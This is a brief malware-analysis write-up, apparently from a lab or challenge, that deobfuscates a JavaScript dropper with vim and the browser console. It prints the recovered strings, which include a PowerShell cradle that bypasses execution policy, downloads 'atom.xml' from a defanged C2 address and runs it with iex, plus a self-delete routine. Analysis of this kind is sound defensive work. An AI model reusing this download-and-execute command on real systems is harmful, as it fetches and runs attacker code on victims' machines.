Opening the sample we are faced with obfuscated javascript with long variable names, for deobfuscating I've decided to use vim to yiw (yank in word) the variable names and then :%s/<CTRL-R>"/new_var/g to replace the symbols.
Since the resulting code consisted of 4 arrays, I have decided to open up chrome and let it evaluate the contents of the arrays by doing the following for each array:
console.log("str_arr_1 = [ \"" + some_array.join("\", \"") + "\" ]; ");
The resulting output is the JS array with all the values I need inlined, which I can freely copy and paste in my editor. Repeating this process 2 times, I get the following output:
str_arr3 = [ "RUN", "WScript.Shell", "powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm 91[.]92.245.231/////////////////////////////////atom.xml) | . iex;Start-Sleep -Seconds 3;", "Scripting.FileSystemObject", "DeleteFile", "ScriptFullName", "Sleep"];
with this, we get the c2 domain 91[.]92.245.231/atom.xml (note the string is defanged with [.]) which should drop and execute another powershell script called "atom.xml" completing the given goal.